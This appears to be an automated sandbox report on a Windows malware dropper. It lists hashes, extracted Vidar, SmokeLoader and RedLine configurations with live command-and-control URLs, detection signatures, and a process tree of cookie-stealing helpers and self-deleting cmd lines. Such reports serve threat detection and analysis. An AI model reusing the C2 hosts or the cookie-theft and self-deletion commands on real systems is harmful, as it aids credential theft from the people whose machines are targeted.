Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1803s
  • max time network
    1813s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 08:13

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 30 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1076
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
        1⤵
        • Drops file in System32 directory
        PID:408
        • C:\Users\Admin\AppData\Roaming\rvbbrew
          C:\Users\Admin\AppData\Roaming\rvbbrew
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5340
        • C:\Users\Admin\AppData\Roaming\rvbbrew
          C:\Users\Admin\AppData\Roaming\rvbbrew
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:6060
        • C:\Users\Admin\AppData\Roaming\hhbbrew
          C:\Users\Admin\AppData\Roaming\hhbbrew
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4964
        • C:\Users\Admin\AppData\Roaming\vabbrew
          C:\Users\Admin\AppData\Roaming\vabbrew
          2⤵
          • Suspicious use of SetThreadContext
          PID:1728
          • C:\Users\Admin\AppData\Roaming\vabbrew
            C:\Users\Admin\AppData\Roaming\vabbrew
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:4840
        • C:\Users\Admin\AppData\Roaming\rvbbrew
          C:\Users\Admin\AppData\Roaming\rvbbrew
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5564
        • C:\Users\Admin\AppData\Roaming\hhbbrew
          C:\Users\Admin\AppData\Roaming\hhbbrew
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4168
        • C:\Users\Admin\AppData\Roaming\vabbrew
          C:\Users\Admin\AppData\Roaming\vabbrew
          2⤵
          • Suspicious use of SetThreadContext
          PID:412
          • C:\Users\Admin\AppData\Roaming\vabbrew
            C:\Users\Admin\AppData\Roaming\vabbrew
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:5764
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1872
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2588
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Modifies registry class
            PID:2788
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2712
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2536
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1264
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                    1⤵
                      PID:2804
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1196
                      • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
                        "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:652
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3088
                          • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:4000
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:424
                              • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_1.exe
                                sonia_1.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1188
                                • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_1.exe" -a
                                  6⤵
                                    PID:344
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:940
                                • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_3.exe
                                  sonia_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:2216
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 928
                                    6⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4220
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2328
                                • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_4.exe
                                  sonia_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2068
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2600
                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4708
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:996
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5276
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:5580
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:4560
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4828
                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                            C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4164
                                        • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          PID:4900
                                          • C:\Windows\winnetdriv.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1627381140 0
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:1556
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:1600
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 804
                                            8⤵
                                            • Program crash
                                            PID:4428
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 940
                                            8⤵
                                            • Program crash
                                            PID:2276
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 956
                                            8⤵
                                            • Program crash
                                            PID:1476
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 996
                                            8⤵
                                            • Program crash
                                            PID:4464
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1000
                                            8⤵
                                            • Program crash
                                            PID:5160
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1072
                                            8⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:5232
                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1824
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5584
                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4860
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 4860 -s 1016
                                            8⤵
                                            • Program crash
                                            PID:5784
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3816
                                    • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:740
                                      • C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe
                                        "C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe"
                                        6⤵
                                          PID:5012
                                          • C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe
                                            "C:\Users\Admin\Documents\AIN_mA1BNE2jF7K0XPakAUSB.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:4440
                                        • C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                          "C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5044
                                          • C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                            C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4136
                                          • C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                            C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                            7⤵
                                              PID:2240
                                            • C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                              C:\Users\Admin\Documents\tVaj9gARNzwLSrtE1aqzmzBT.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4932
                                          • C:\Users\Admin\Documents\AsXLFMrUm73pXEKpYhyOsAMN.exe
                                            "C:\Users\Admin\Documents\AsXLFMrUm73pXEKpYhyOsAMN.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5032
                                            • C:\Users\Admin\AppData\Roaming\updata.exe
                                              C:\Users\Admin\AppData\Roaming\updata.exe updata
                                              7⤵
                                              • Executes dropped EXE
                                              PID:6116
                                              • C:\Users\Admin\AppData\Roaming\updata.exe
                                                "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                8⤵
                                                  PID:1188
                                            • C:\Users\Admin\Documents\h27CGQGr04J3VPJwetDm0v4I.exe
                                              "C:\Users\Admin\Documents\h27CGQGr04J3VPJwetDm0v4I.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5000
                                            • C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe
                                              "C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4992
                                              • C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe
                                                C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:3756
                                              • C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe
                                                C:\Users\Admin\Documents\jLu3aw2DWDUHOO_H1WlwGC3z.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4668
                                            • C:\Users\Admin\Documents\rxExJf6OgRASUhj6fIlKWlJO.exe
                                              "C:\Users\Admin\Documents\rxExJf6OgRASUhj6fIlKWlJO.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4984
                                            • C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe
                                              "C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4976
                                              • C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe
                                                C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                PID:4404
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im ei3zXbQUfjHZ85pXddwzQEzS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ei3zXbQUfjHZ85pXddwzQEzS.exe" & del C:\ProgramData\*.dll & exit
                                                  8⤵
                                                    PID:6140
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:6096
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ei3zXbQUfjHZ85pXddwzQEzS.exe /f
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5604
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 6
                                                      9⤵
                                                      • Delays execution with timeout.exe
                                                      PID:5556
                                              • C:\Users\Admin\Documents\lhLHsazYL2j30EhMj_GdaQyv.exe
                                                "C:\Users\Admin\Documents\lhLHsazYL2j30EhMj_GdaQyv.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:5112
                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5332
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:5796
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:6028
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:672
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                        PID:5704
                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      PID:5348
                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5388
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5636
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5456
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                          PID:5660
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                            PID:5772
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                              PID:4188
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:5632
                                                          • C:\Users\Admin\Documents\N1uKGLM2GSpGIBBhXEjlplLr.exe
                                                            "C:\Users\Admin\Documents\N1uKGLM2GSpGIBBhXEjlplLr.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:5100
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im N1uKGLM2GSpGIBBhXEjlplLr.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\N1uKGLM2GSpGIBBhXEjlplLr.exe" & del C:\ProgramData\*.dll & exit
                                                              7⤵
                                                                PID:4576
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im N1uKGLM2GSpGIBBhXEjlplLr.exe /f
                                                                  8⤵
                                                                  • Kills process with taskkill
                                                                  PID:5912
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 6
                                                                  8⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:5224
                                                            • C:\Users\Admin\Documents\XWVyyK7MebkSM8rVjws1LTnA.exe
                                                              "C:\Users\Admin\Documents\XWVyyK7MebkSM8rVjws1LTnA.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:5068
                                                            • C:\Users\Admin\Documents\jGXsRSfj8shaCiRlsQPcWsV3.exe
                                                              "C:\Users\Admin\Documents\jGXsRSfj8shaCiRlsQPcWsV3.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4456
                                                            • C:\Users\Admin\Documents\tqkWXxk2NvhZpuGmAT6A8pRU.exe
                                                              "C:\Users\Admin\Documents\tqkWXxk2NvhZpuGmAT6A8pRU.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Drops startup file
                                                              PID:4320
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:6096
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4556
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4608
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
